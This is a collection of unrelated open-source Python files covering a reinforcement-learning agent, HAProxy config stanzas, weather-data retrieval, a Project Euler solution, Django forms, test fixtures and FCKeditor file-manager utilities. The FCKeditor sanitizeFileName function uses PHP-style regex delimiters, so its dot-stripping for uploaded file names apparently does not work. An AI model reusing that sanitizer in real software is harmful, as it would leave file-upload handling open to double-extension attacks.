houseTemplate.addBuildingSign("object/tangible/sign/player/shared_house_address.iff", Point3D(1, 2, 3))
houseTemplate.addPlaceablePlanet("corellia")
houseTemplate.addPlaceablePlanet("talus")
houseTemplate.setDefaultItemLimit(400)
houseTemplate.setBaseMaintenanceRate(1000)
houseTemplate.setCivicStructure(True)
housingTemplates.put(houseTemplate.getDeedTemplate(), houseTemplate)
return | ProjectSWGCore/NGECore2 | scripts/houses/player_cityhall_corellia_style_01.py | Python | lgpl-3.0 | 688 |
# python3
# pylint: disable=g-bad-file-header
# Copyright 2019 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""A simple implementation of Bootstrapped DQN with prior networks.
References:
1. "Deep Exploration via Bootstrapped DQN" (Osband et al., 2016)
2. "Deep Exploration via Randomized Value Functions" (Osband et al., 2017)
3. "Randomized Prior Functions for Deep RL" (Osband et al, 2018)
Links:
1. https://arxiv.org/abs/1602.04621
2. https://arxiv.org/abs/1703.07608
3. https://arxiv.org/abs/1806.03335
Notes:
- This agent is implemented with TensorFlow 2 and Sonnet 2. For installation
instructions for these libraries, see the README.md in the parent folder.
- This implementation is potentially inefficient, as it does not parallelise
computation across the ensemble for simplicity and readability.
"""
import copy
from typing import Callable, NamedTuple, Optional, Sequence
from bsuite.baselines import base
from bsuite.baselines.utils import replay
import dm_env
from dm_env import specs
import numpy as np
import sonnet as snt
import tensorflow as tf
import tree
class BootstrappedDqn(base.Agent):
"""Bootstrapped DQN with additive prior functions."""
def __init__(
self,
obs_spec: specs.Array,
action_spec: specs.DiscreteArray,
ensemble: Sequence[snt.Module],
batch_size: int,
discount: float,
replay_capacity: int,
min_replay_size: int,
sgd_period: int,
target_update_period: int,
optimizer: snt.Optimizer,
mask_prob: float,
noise_scale: float,
epsilon_fn: Callable[[int], float] = lambda _: 0.,
seed: Optional[int] = None,
):
"""Bootstrapped DQN with additive prior functions."""
# Agent components.
self._ensemble = ensemble
self._forward = [tf.function(net) for net in ensemble]
self._target_ensemble = [copy.deepcopy(network) for network in ensemble]
self._num_ensemble = len(ensemble)
self._optimizer = optimizer
self._replay = replay.Replay(capacity=replay_capacity)
# Create variables for each network in the ensemble
for network in ensemble:
snt.build(network, (None, *obs_spec.shape))
# Agent hyperparameters.
self._num_actions = action_spec.num_values
self._batch_size = batch_size
self._sgd_period = sgd_period
self._target_update_period = target_update_period
self._min_replay_size = min_replay_size
self._epsilon_fn = epsilon_fn
self._mask_prob = mask_prob
self._noise_scale = noise_scale
self._rng = np.random.RandomState(seed)
self._discount = discount
# Agent state.
self._total_steps = tf.Variable(1)
self._active_head = 0
tf.random.set_seed(seed)
@tf.function
def _step(self, transitions: Sequence[tf.Tensor]):
"""Does a step of SGD for the whole ensemble over `transitions`."""
o_tm1, a_tm1, r_t, d_t, o_t, m_t, z_t = transitions
variables = tree.flatten(
[model.trainable_variables for model in self._ensemble])
with tf.GradientTape() as tape:
losses = []
for k in range(self._num_ensemble):
net = self._ensemble[k]
target_net = self._target_ensemble[k]
# Q-learning loss with added reward noise + half-in bootstrap.
q_values = net(o_tm1)
one_hot_actions = tf.one_hot(a_tm1, depth=self._num_actions)
train_value = tf.reduce_sum(q_values * one_hot_actions, axis=-1)
target_value = tf.stop_gradient(tf.reduce_max(target_net(o_t), axis=-1))
target_y = r_t + z_t[:, k] + self._discount * d_t * target_value
loss = tf.square(train_value - target_y) * m_t[:, k]
losses.append(loss)
loss = tf.reduce_mean(tf.stack(losses))
gradients = tape.gradient(loss, variables)
self._total_steps.assign_add(1)
self._optimizer.apply(gradients, variables)
# Periodically update the target network.
if tf.math.mod(self._total_steps, self._target_update_period) == 0:
for k in range(self._num_ensemble):
for src, dest in zip(self._ensemble[k].variables,
self._target_ensemble[k].variables):
dest.assign(src)
def select_action(self, timestep: dm_env.TimeStep) -> base.Action:
"""Select values via Thompson sampling, then use epsilon-greedy policy."""
if self._rng.rand() < self._epsilon_fn(self._total_steps.numpy()):
return self._rng.randint(self._num_actions)
# Greedy policy, breaking ties uniformly at random.
batched_obs = tf.expand_dims(timestep.observation, axis=0)
q_values = self._forward[self._active_head](batched_obs)[0].numpy()
action = self._rng.choice(np.flatnonzero(q_values == q_values.max()))
return int(action)
def update(
self,
timestep: dm_env.TimeStep,
action: base.Action,
new_timestep: dm_env.TimeStep,
):
"""Update the agent: add transition to replay and periodically do SGD."""
if new_timestep.last():
self._active_head = self._rng.randint(self._num_ensemble)
self._replay.add(
TransitionWithMaskAndNoise(
o_tm1=timestep.observation,
a_tm1=action,
r_t=np.float32(new_timestep.reward),
d_t=np.float32(new_timestep.discount),
o_t=new_timestep.observation,
m_t=self._rng.binomial(1, self._mask_prob,
self._num_ensemble).astype(np.float32),
z_t=self._rng.randn(self._num_ensemble).astype(np.float32) *
self._noise_scale,
))
if self._replay.size < self._min_replay_size:
return
if tf.math.mod(self._total_steps, self._sgd_period) == 0:
minibatch = self._replay.sample(self._batch_size)
minibatch = [tf.convert_to_tensor(x) for x in minibatch]
self._step(minibatch)
class TransitionWithMaskAndNoise(NamedTuple):
o_tm1: np.ndarray
a_tm1: base.Action
r_t: float
d_t: float
o_t: np.ndarray
m_t: np.ndarray
z_t: np.ndarray
class NetworkWithPrior(snt.Module):
"""Combines network with additive untrainable "prior network"."""
def __init__(self,
network: snt.Module,
prior_network: snt.Module,
prior_scale: float = 1.):
super().__init__(name='network_with_prior')
self._network = network
self._prior_network = prior_network
self._prior_scale = prior_scale
def __call__(self, inputs: tf.Tensor) -> tf.Tensor:
q_values = self._network(inputs)
prior_q_values = self._prior_network(inputs)
return q_values + self._prior_scale * tf.stop_gradient(prior_q_values)
def make_ensemble(num_actions: int,
num_ensemble: int = 20,
num_hidden_layers: int = 2,
num_units: int = 50,
prior_scale: float = 3.) -> Sequence[snt.Module]:
"""Convenience function to make an ensemble from flags."""
output_sizes = [num_units] * num_hidden_layers + [num_actions]
ensemble = []
for _ in range(num_ensemble):
network = snt.Sequential([
snt.Flatten(),
snt.nets.MLP(output_sizes),
])
prior_network = snt.Sequential([
snt.Flatten(),
snt.nets.MLP(output_sizes),
])
ensemble.append(NetworkWithPrior(network, prior_network, prior_scale))
return ensemble
def default_agent(
obs_spec: specs.Array,
action_spec: specs.DiscreteArray,
num_ensemble: int = 20,
) -> BootstrappedDqn:
"""Initialize a Bootstrapped DQN agent with default parameters."""
ensemble = make_ensemble(
num_actions=action_spec.num_values, num_ensemble=num_ensemble)
optimizer = snt.optimizers.Adam(learning_rate=1e-3)
return BootstrappedDqn(
obs_spec=obs_spec,
action_spec=action_spec,
ensemble=ensemble,
batch_size=128,
discount=.99,
replay_capacity=10000,
min_replay_size=128,
sgd_period=1,
target_update_period=4,
optimizer=optimizer,
mask_prob=0.5,
noise_scale=0.0,
epsilon_fn=lambda t: 10 / (10 + t),
seed=42,
)
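# Hypothetical smoke test (not part of the original module): build the default
# Bootstrapped DQN agent and run a few episodes of a bsuite environment with
# the standard dm_env loop. Assumes the `bsuite` package is installed and that
# 'catch/0' is an available bsuite_id.
if __name__ == '__main__':
  import bsuite
  env = bsuite.load_from_id('catch/0')  # any bsuite_id works here
  agent = default_agent(env.observation_spec(), env.action_spec())
  for _ in range(5):  # a handful of episodes, just to exercise the code paths
    timestep = env.reset()
    while not timestep.last():
      action = agent.select_action(timestep)
      new_timestep = env.step(action)
      agent.update(timestep, action, new_timestep)
      timestep = new_timestep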
| deepmind/bsuite | bsuite/baselines/tf/boot_dqn/agent.py | Python | apache-2.0 | 8,645 |
import logging
from ..directives import directives_by_section
logger = logging.getLogger(__name__)
class Stanza(object):
"""
Subclass for config file stanzas.
In an HAProxy config file, a stanza is in the form of::
stanza header
directive
directive
directive
Stanza instances have a `header` attribute for the header and a list of
`lines`, one for each directive line.
"""
def __init__(self, section_name):
self.section_name = section_name
self.header = section_name
self.lines = []
def add_lines(self, lines):
"""
Simple helper method for adding multiple lines at once.
"""
for line in lines:
self.add_line(line)
def add_line(self, line):
"""
Adds a given line string to the list of lines, validating the line
first.
"""
if not self.is_valid_line(line):
logger.warn(
"Invalid line for %s section: '%s'",
self.section_name, line
)
return
self.lines.append(line)
def is_valid_line(self, line):
"""
Validates a given line against the associated "section" (e.g. 'global'
or 'frontend', etc.) of a stanza.
If a line represents a directive that shouldn't be within the stanza
it is rejected. See the `directives.json` file for a condensed look
at valid directives based on section.
"""
adjusted_line = line.strip().lower()
return any([
adjusted_line.startswith(directive)
for directive in directives_by_section[self.section_name]
])
def __str__(self):
"""
Returns the string representation of a Stanza, meant for use in
config file content.
if no lines are defined an empty string is returned.
"""
if not self.lines:
return ""
return self.header + "\n" + "\n".join([
"\t" + line
for line in self.lines
])
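# Hypothetical usage sketch: build a stanza for the "global" section and
# render it. This assumes the bundled directives.json lists "daemon" and
# "maxconn" as valid directives for the global section; invalid lines are
# logged and dropped by add_line() above.
if __name__ == "__main__":
    stanza = Stanza("global")
    stanza.add_lines(["daemon", "maxconn 256"])
    print(str(stanza))
    # global
    #     daemon
    #     maxconn 256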
| wglass/lighthouse | lighthouse/haproxy/stanzas/stanza.py | Python | apache-2.0 | 2,087 |
#!/usr/bin/env python
"""
Background:
--------
NARR_RetrieveLocation_Variable.py
Purpose:
--------
Routines to retrieve, output NARR data from a single point over time to combine for analysis
History:
--------
2016-09-20 : Bell - simplify existing multiple routines for various locations into one package
"""
#System Stack
import datetime
import sys
#Science Stack
import numpy as np
from netCDF4 import num2date
#User Stack
from io_utils.EcoFOCI_netCDF_read import EcoFOCI_netCDF
from calc.EPIC2Datetime import EPIC2Datetime, get_UDUNITS, Datetime2EPIC
import calc.haversine as sphered
__author__ = 'Shaun Bell'
__email__ = 'shaun.bell@noaa.gov'
__created__ = datetime.datetime(2016, 9, 20)
__modified__ = datetime.datetime(2016, 9, 20)
__version__ = "0.1.0"
__status__ = "Development"
__keywords__ = 'NARR'
"---"
def rotate_coord(angle_rot, mag, dir):
""" converts math coords to along/cross shelf.
+ onshore / along coast with land to right (right handed)
- offshore / along coast with land to left
    Todo: convert to met standard for winds (left-handed coordinate system).
"""
dir = dir - angle_rot
along = mag * np.sin(np.deg2rad(dir))
cross = mag * np.cos(np.deg2rad(dir))
return (along, cross)
def triangle_smoothing(data_in):
weights=np.array([0.25,0.5,0.25])
filtered_data = np.convolve(data_in,np.array(weights),'same') #edge effects
return filtered_data
def from_netcdf_1dsplice(infile, height_ind, lat_ind, lon_ind):
""" Uses ncreadfile_dic which returns a dictionary of all data from netcdf"""
###nc readin/out
df = EcoFOCI_netCDF(infile)
nchandle = df._getnchandle_()
params = df.get_vars() #gets all of them
print "Parameters available: "
#print params
ncdata = ncreadfile_dic_slice(nchandle, params, height_ind=height_ind, lat_ind=lat_ind, lon_ind=lon_ind)
df.close()
return ncdata
def get_geocoords(infile, lat='lat', lon='lon'):
df = EcoFOCI_netCDF(infile)
nchandle = df._getnchandle_()
data = {}
for j, v in enumerate([lat, lon]):
data[v] = nchandle.variables[v][:]
df.close()
return (data)
def ncreadfile_dic_slice(nchandle, params, height_ind=None, lat_ind=None, lon_ind=None):
"""returns slice of data for all times but for specified height/lat/lon indicies"""
data = {}
if height_ind == None:
for j, v in enumerate(params):
try: #check for nc variable
data[v] = nchandle.variables[v][:,lat_ind,lon_ind]
except ValueError: #if parameter is not of expected dimensions
data[v] = nchandle.variables[v][:]
else:
for j, v in enumerate(params):
try: #check for nc variable
data[v] = nchandle.variables[v][:,:,lat_ind,lon_ind]
except ValueError: #if parameter is not of expected dimensions
data[v] = nchandle.variables[v][:]
return data
"""--------------------------------main Routines---------------------------------------"""
""" currently hard coded - variables and ranges """
### Grab grid points for future slicing - assume grid is same in all model output
NARR = '/Volumes/WDC_internal/Users/bell/Data_Local/Reanalysis_Files/NARR/daily/'
infile = [NARR + 'uwnd.10m.2016.nc']
lat_lon = get_geocoords(infile[0])
#stn ['1','2']
station_name = ['UP stn_1']
sta_lat = [54.5]
sta_long = [161.0]
#Find NARR nearest point to moorings - haversine formula
# NARR data is -180->180 (positive east), Moorings are usually expressed +W for FOCI
station_1 = sphered.nearest_point([sta_lat[0],-1 * sta_long[0]],lat_lon['lat'],lat_lon['lon'], '2d')
stn1_modelpt = [lat_lon['lat'][station_1[3],station_1[4]],lat_lon['lon'][station_1[3],station_1[4]]]
print "stn1 nearest point to %s, %s which is lat:%s , lon:%s" \
% (sta_lat[0], sta_long[0], stn1_modelpt[0], stn1_modelpt[1])
"""
#loop over all requested data
years = range(2010,2017)
years = ['mon.mean']
for yy in years:
# retrieve only these location's data
# uwnd
infile = NARR + 'uwnd.10m.'+ str(yy) + '.nc'
print "Working on file " + infile
stn1_data = from_netcdf_1dsplice(infile, None, station_1[3], station_1[4])
#filter data
stn1u_f = triangle_smoothing(stn1_data['uwnd'])
stn1u = stn1_data['uwnd']
# retrieve only these location's data
# vwnd
infile = NARR + 'vwnd.10m.'+ str(yy) + '.nc'
print "Working on file " + infile
stn1_data = from_netcdf_1dsplice(infile, None, station_1[3], station_1[4])
#filter data
stn1v_f = triangle_smoothing(stn1_data['vwnd'])
stn1v = stn1_data['vwnd']
#convert to EPIC time
#epic_time, epic_time1 = Datetime2EPIC(num2date(stn1_data['time'], "hours since 1800-1-1 00:00:0.0"))
Datetime2EPIC(num2date(x, "hours since 1800-1-1 00:00:0.0")) for x in stn1_data['time']
###
#output 0,6,12,18 UTC
#subsample data
# time_ind = np.where(pydate%0.25 == 0)[0]
# output u,v wind components from model grid points
save_to_nc = False
if save_to_nc:
# write to NetCDF
outfile = 'data/NARR_stn1_' + str(yy) + '.nc'
print "Writing to Epic NetCDF " + outfile
# write2epic( outfile, station_name[1], [epic_time[time_ind], epic_time1[time_ind]], stn1_modelpt, [stn1u_f[time_ind], stn1v_f[time_ind]])
write2epic( outfile, station_name[1], [epic_time, epic_time1], stn1_modelpt, [stn1u, stn1v])
"""
"""-----------using xarray---------"""
import pandas as pd
import xarray as xa
#index = [station_1[3],station_1[4]]
index=[195,76]
ufilein='/Volumes/WDC_internal/Users/bell/Data_Local/Reanalysis_Files/NARR/daily/uwnd.10m.2016.nc'
udata = xa.open_dataset(ufilein, decode_cf=False)
udata = xa.decode_cf(udata,mask_and_scale=False)
dum = udata.uwnd[:443,195,76].resample('D', udata.time, how='mean')
print dum.to_pandas().to_csv()
vfilein='/Volumes/WDC_internal/Users/bell/Data_Local/Reanalysis_Files/NARR/daily/vwnd.10m.2016.nc'
vdata = xa.open_dataset(vfilein, decode_cf=False)
vdata = xa.decode_cf(vdata,mask_and_scale=False)
dvm = vdata.vwnd[:443,195,76].resample('D', vdata.time, how='mean')
print dvm.to_pandas().to_csv()
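# Hypothetical sanity check for the triangle_smoothing() helper defined above:
# each point becomes 0.25*previous + 0.5*current + 0.25*next (with edge
# effects at the ends), so an isolated spike of height 4 spreads into
# [0, 1, 2, 1, 0].
test_spike = np.array([0., 0., 4., 0., 0.])
print(triangle_smoothing(test_spike))  # [ 0.  1.  2.  1.  0.]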
| shaunwbell/FOCI_Analysis | ReanalysisRetrieval/NARR_RetrieveLocation_Variable.py | Python | mit | 6,281 |
'''
Project Euler - Problem 71
Consider the fraction, n/d, where n and d are positive integers. If n<d and
HCF(n,d)=1, it is called a reduced proper fraction.
If we list the set of reduced proper fractions for d<=8 in ascending order of
size, we get:
1/8, 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5, 5/8, 2/3, 5/7,
3/4, 4/5, 5/6, 6/7, 7/8
It can be seen that 2/5 is the fraction immediately to the left of 3/7.
By listing the set of reduced proper fractions for d<=1,000,000 in ascending
order of size, find the numerator of the fraction immediately to the left of
3/7.
'''
from math import ceil
#return the prime factors of a number
#second argument 'all' is a boolean
#saying if all instances of a repeated
#prime should be returned, e.g.:
# factors(12, True) = [3, 2, 2]
# factors(12, False) = [3, 2]
def primeFactors(n, all):
if n == 1: return [1]
i = 2
limit = n**0.5
while i <= limit:
if n % i == 0:
ret = primeFactors(n/i,all)
if all: ret.append(i)
elif not i==ret[-1]: ret.append(i)
return ret
i += 1
return [n]
#main
target_n = 3
target_d = 7
max_d = 1000000
#Idea: we want to be smaller than and as close as possible to 3/7.
#The smallest step occurs for the largest denominator d.
#Algorithm is:
# 1- assuming the max d, 1000000
# 2- calculate n such that n/d<=3/7
# 3- if n/d is a proper fraction, stop, answer found.
# 4- if not, reduce n by 1 and repeat step 2.
# ###
# calculates the maximum numerator for which n/d<3/7, d=1000000
max_n = max_d * target_n/target_d
# now iterates n<max_n and finds a d<max_d
# which result in a proper fraction
n=max_n
while n>1:
d=int(ceil(float(n)*target_d/target_n))
    #check if n/d is a proper fraction
if set(primeFactors(n,False)).intersection(
set(primeFactors(d,False)))==set():
print n
break
n-=1
#output
# 428570
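# Hypothetical cross-check using only the standard library: for each d, the
# largest numerator with n/d < 3/7 is (3*d - 1)//7, so taking the maximum of
# those fractions over all d <= 1,000,000 reproduces the answer above.
# (Brute force - it takes a few seconds to run.)
from fractions import Fraction
best = max(Fraction((3 * d - 1) // 7, d) for d in range(2, 1000001))
print(best.numerator)
# 428570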
| haphaeu/yoshimi | EulerProject/071.py | Python | lgpl-3.0 | 1,944 |
# coding=utf-8
# Copyright 2022 The Edward2 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defined utility functions for attentive uncertainty models.
"""
import tensorflow.compat.v1 as tf
def mse(y_true, y_pred_dist, reduction='mean'):
"""Returns the mean squared error for a predictive distribution.
Args:
y_true: (float) Tensor of target labels.
y_pred_dist: An edward2 distribution object.
reduction: (string) Either 'sum' or 'mean'.
"""
if reduction == 'sum':
return tf.reduce_sum(
tf.squared_difference(y_true,
y_pred_dist.distribution.mean()))
else:
return tf.losses.mean_squared_error(y_true,
y_pred_dist.distribution.mean())
def nll(y_true, y_pred_dist, reduction='mean'):
"""Returns the negative log-likelihood of a model w.r.t. true targets.
Args:
y_true: (float) Tensor of target labels.
y_pred_dist: An edward2 distribution object.
reduction: (string) Either 'sum' or 'mean'.
"""
log_p = y_pred_dist.distribution.log_prob(y_true)
if reduction == 'sum':
return -tf.reduce_sum(log_p)
else:
return -tf.reduce_mean(log_p)
def mlp_block(in_dim, hidden_sizes, activation=tf.nn.relu):
"""Return keras sequential MLP object for the final axis of a 2/3D tensor.
Args:
in_dim: (int) Input dimension for final axis.
hidden_sizes: (list of ints) An iterable containing the output sizes of the
MLP as defined in `basic.Linear`.
activation: (callable) Activation applied to all but the final layer.
Returns:
tensor of shape [B, n, d_out] where d_out = hidden_sizes[-1]
"""
net = tf.keras.Sequential([tf.keras.layers.InputLayer(in_dim)])
for size in hidden_sizes[:-1]:
net.add(tf.keras.layers.Dense(size, activation=activation))
net.add(tf.keras.layers.Dense(hidden_sizes[-1], activation=None))
return net
@tf.function
def train_step(model, data, optimizer_config, is_mse=False):
"""Applies gradient updates and returns appropriate metrics.
Args:
model: An instance of SNP Regressor.
data: A 5-tuple consisting of context_x, context_y, target_x, target_y,
unseen_targets (i.e., target_x-context_x).
optimizer_config: A dictionary with two keys: an 'optimizer' object and
a 'max_grad_norm' for clipping gradients.
is_mse: Use mse (fixed variance) if True else use nll.
Returns:
nll_term: Negative log-likelihood assigned by model to unseen targets.
mse_term: Mean squared error of model for unseen targets.
local_kl: KL loss for latent variables of unseen targets.
global_kl: KL loss for global latent variable.
"""
context_x, context_y, target_x, target_y, unseen_targets = data
num_context = tf.shape(context_x)[1]
with tf.GradientTape() as tape:
prediction = model(
context_x,
context_y,
target_x,
target_y)
unseen_predictions = prediction[:, num_context:]
nll_term = nll(unseen_targets, unseen_predictions)
mse_term = mse(unseen_targets, unseen_predictions)
loss = mse_term if is_mse else nll_term
if model.local_variational:
local_kl = tf.reduce_mean(
tf.reduce_sum(model.losses[-1][:, num_context:], axis=[1, 2]))
else:
local_kl = 0.
global_kl = tf.reduce_mean(tf.reduce_sum(model.losses[-2], axis=-1))
loss += local_kl + global_kl
gradients = tape.gradient(loss, model.trainable_variables)
max_grad_norm = optimizer_config['max_grad_norm']
optimizer = optimizer_config['optimizer']
clipped_gradients, _ = tf.clip_by_global_norm(gradients, max_grad_norm)
optimizer.apply_gradients(zip(clipped_gradients, model.trainable_variables))
return nll_term, mse_term, local_kl, global_kl
@tf.function
def train_gnp_step(model, data, optimizer_config, is_mse=False):
"""Applies gradient updates and returns appropriate metrics.
Args:
model: An instance of GNP Regressor.
data: A 5-tuple consisting of context_x, context_y, target_x, target_y,
unseen_targets (i.e., target_x-context_x).
optimizer_config: A dictionary with two keys: an 'optimizer' object and
a 'max_grad_norm' for clipping gradients.
is_mse: Use mse (fixed variance) if True else use nll.
Returns:
nll_term: Negative log-likelihood assigned by model to unseen targets.
mse_term: Mean squared error of model for unseen targets.
local_kl: KL loss for latent variables of unseen targets.
global_kl: KL loss for global latent variable.
"""
context_x, context_y, target_x, target_y, unseen_targets = data
num_context = tf.shape(context_x)[1]
with tf.GradientTape() as tape:
prediction = model(
context_x,
context_y,
target_x,
target_y)
unseen_predictions = prediction[:, num_context:]
nll_term = nll(unseen_targets, unseen_predictions)
mse_term = mse(unseen_targets, unseen_predictions)
loss = mse_term if is_mse else nll_term
local_kl = tf.reduce_mean(
tf.reduce_sum(model.losses[-1][:, num_context:], axis=[1, 2]))
global_kl = tf.reduce_mean(tf.reduce_sum(model.losses[-2], axis=-1))
loss += local_kl + global_kl
gradients = tape.gradient(loss, model.trainable_variables)
max_grad_norm = optimizer_config['max_grad_norm']
optimizer = optimizer_config['optimizer']
clipped_gradients, _ = tf.clip_by_global_norm(gradients, max_grad_norm)
optimizer.apply_gradients(zip(clipped_gradients, model.trainable_variables))
return nll_term, mse_term, local_kl, global_kl
| google/edward2 | experimental/attentive_uncertainty/utils.py | Python | apache-2.0 | 6,033 |
from django import forms
from django.utils.translation import ugettext_lazy as _
#import settings
from cmsplugin_contact.nospam.forms import HoneyPotForm, RecaptchaForm, AkismetForm
class ContactForm(forms.Form):
email = forms.EmailField(label=_("Email"))
subject = forms.CharField(label=_("Subject"), required=False)
content = forms.CharField(label=_("Content"), widget=forms.Textarea())
template = "cmsplugin_contact/contact.html"
class HoneyPotContactForm(HoneyPotForm):
pass
class AkismetContactForm(AkismetForm):
akismet_fields = {
'comment_author_email': 'email',
'comment_content': 'content'
}
akismet_api_key = None
class RecaptchaContactForm(RecaptchaForm):
recaptcha_public_key = None
recaptcha_private_key = None
recaptcha_theme = None
| wlanslovenija/cmsplugin-contact | cmsplugin_contact/forms.py | Python | bsd-2-clause | 821 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009 Zuza Software Foundation
#
# This file is part of Pootle.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns
urlpatterns = patterns('pootle_terminology.views',
(r'^(?P<language_code>[^/]*)/(?P<project_code>[^/]*)/terminology_extract.html',
'extract'),
(r'^(?P<language_code>[^/]*)/(?P<project_code>[^/]*)/terminology_manage.html',
'manage'),
(r'^(?P<language_code>[^/]*)/(?P<project_code>[^/]*)/(?P<path>.*?)/terminology_manage.html',
'manage'),
)
| ttreeagency/PootleTypo3Org | pootle/apps/pootle_terminology/urls.py | Python | gpl-2.0 | 1,173 |
# -*- coding: utf-8 -*-
"""
fixtures.py
This module stores all of the relevant fixtures used in testing.
"""
from .fixtures_data import (
JSON15min2day,
two_sites_two_params_iv,
nothing_avail,
mult_flags,
diff_freq,
startDST,
endDST,
)
from .fixtures_daily_dupe import daily_dupe, daily_dupe_altered
from .fixtures_multiple_methods import multi_meth
from .fixtures_tzfail import tzfail
from .fixtures_recent_only import recent_only
from .fixtures_usgs_rdb import (
field_fixture,
rating_fixture,
peaks_fixture,
parsing_error_fixture,
)
class fakeResponse(object):
def __init__(
self,
code=200,
url="fake url",
reason="fake reason",
text="fake text",
json=JSON15min2day,
):
self.status_code = code
self.url = url
self.reason = reason
self.text = text
# .json will return a function
# .json() will return JSON15min2day
self.json = lambda: json
if self.status_code == 200:
self.ok = True
else:
self.ok = False
def raise_for_status(self):
return self.status_code
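# Hypothetical example of how this fixture is typically used in tests (the URL
# below is made up): substitute fakeResponse for the real requests response,
# e.g. by monkeypatching requests.get, and the code under test sees a
# normal-looking .ok / .json() / .text interface.
def _fake_get(url, **kwargs):
    return fakeResponse(code=200, url=url)

if __name__ == "__main__":
    resp = _fake_get("https://waterservices.usgs.gov/nwis/iv/")
    assert resp.ok
    assert resp.json() == JSON15min2day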
| mroberge/hydrofunctions | tests/fixtures.py | Python | mit | 1,184 |
#!/usr/bin/env python
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2009 Frederico Caldeira Knabben
== BEGIN LICENSE ==
Licensed under the terms of any of the following licenses at your
choice:
- GNU General Public License Version 2 or later (the "GPL")
http://www.gnu.org/licenses/gpl.html
- GNU Lesser General Public License Version 2.1 or later (the "LGPL")
http://www.gnu.org/licenses/lgpl.html
- Mozilla Public License Version 1.1 or later (the "MPL")
http://www.mozilla.org/MPL/MPL-1.1.html
== END LICENSE ==
Utility functions for the File Manager Connector for Python
"""
import string, re
import os
import config as Config
# Generic manipulation functions
def removeExtension(fileName):
index = fileName.rindex(".")
newFileName = fileName[0:index]
return newFileName
def getExtension(fileName):
index = fileName.rindex(".") + 1
fileExtension = fileName[index:]
return fileExtension
def removeFromStart(string, char):
return string.lstrip(char)
def removeFromEnd(string, char):
return string.rstrip(char)
# Path functions
def combinePaths( basePath, folder ):
return removeFromEnd( basePath, '/' ) + '/' + removeFromStart( folder, '/' )
def getFileName(filename):
" Purpose: helper function to extrapolate the filename "
for splitChar in ["/", "\\"]:
array = filename.split(splitChar)
if (len(array) > 1):
filename = array[-1]
return filename
def sanitizeFolderName( newFolderName ):
"Do a cleanup of the folder name to avoid possible problems"
# Remove . \ / | : ? * " < > and control characters
return re.sub( '(?u)\\.|\\\\|\\/|\\||\\:|\\?|\\*|"|<|>|[^\u0000-\u001f\u007f-\u009f]', '_', newFolderName )
def sanitizeFileName( newFileName ):
"Do a cleanup of the file name to avoid possible problems"
# Replace dots in the name with underscores (only one dot can be there... security issue).
if ( Config.ForceSingleExtension ): # remove dots
newFileName = re.sub ( '/\\.(?![^.]*$)/', '_', newFileName ) ;
newFileName = newFileName.replace('\\','/') # convert windows to unix path
newFileName = os.path.basename (newFileName) # strip directories
# Remove \ / | : ? *
return re.sub ( '(?u)/\\\\|\\/|\\||\\:|\\?|\\*|"|<|>|[^\u0000-\u001f\u007f-\u009f]/', '_', newFileName )
def getCurrentFolder(currentFolder):
if not currentFolder:
currentFolder = '/'
# Check the current folder syntax (must begin and end with a slash).
if (currentFolder[-1] <> "/"):
currentFolder += "/"
if (currentFolder[0] <> "/"):
currentFolder = "/" + currentFolder
# Ensure the folder path has no double-slashes
while '//' in currentFolder:
currentFolder = currentFolder.replace('//','/')
# Check for invalid folder paths (..)
if '..' in currentFolder or '\\' in currentFolder:
return None
return currentFolder
def mapServerPath( environ, url):
" Emulate the asp Server.mapPath function. Given an url path return the physical directory that it corresponds to "
# This isn't correct but for the moment there's no other solution
# If this script is under a virtual directory or symlink it will detect the problem and stop
return combinePaths( getRootPath(environ), url )
def mapServerFolder(resourceTypePath, folderPath):
return combinePaths ( resourceTypePath , folderPath )
def getRootPath(environ):
"Purpose: returns the root path on the server"
# WARNING: this may not be thread safe, and doesn't work w/ VirtualServer/mod_python
# Use Config.UserFilesAbsolutePath instead
if environ.has_key('DOCUMENT_ROOT'):
return environ['DOCUMENT_ROOT']
else:
realPath = os.path.realpath( './' )
selfPath = environ['SCRIPT_FILENAME']
selfPath = selfPath [ : selfPath.rfind( '/' ) ]
selfPath = selfPath.replace( '/', os.path.sep)
position = realPath.find(selfPath)
# This can check only that this script isn't run from a virtual dir
# But it avoids the problems that arise if it isn't checked
if ( position < 0 or position <> len(realPath) - len(selfPath) or realPath[ : position ]==''):
raise Exception('Sorry, can\'t map "UserFilesPath" to a physical path. You must set the "UserFilesAbsolutePath" value in "editor/filemanager/connectors/py/config.py".')
return realPath[ : position ]
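# Hypothetical sanity checks for the path helpers above (the file and folder
# names are made up): getCurrentFolder() normalises slashes and rejects
# traversal attempts, while getFileName() strips any directory part.
if __name__ == "__main__":
    assert getCurrentFolder("subdir") == "/subdir/"
    assert getCurrentFolder("a//b") == "/a/b/"
    assert getCurrentFolder("../etc") is None
    assert getFileName("C:\\uploads\\img.gif") == "img.gif"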
| Goutte/Ni | v1/web/apostrophePlugin/web/js/fckeditor/editor/filemanager/connectors/py/fckutil.py | Python | gpl-2.0 | 4,235 |
############################################################################
##
## Copyright (C) 2006-2008 University of Utah. All rights reserved.
##
## This file is part of VisTrails.
##
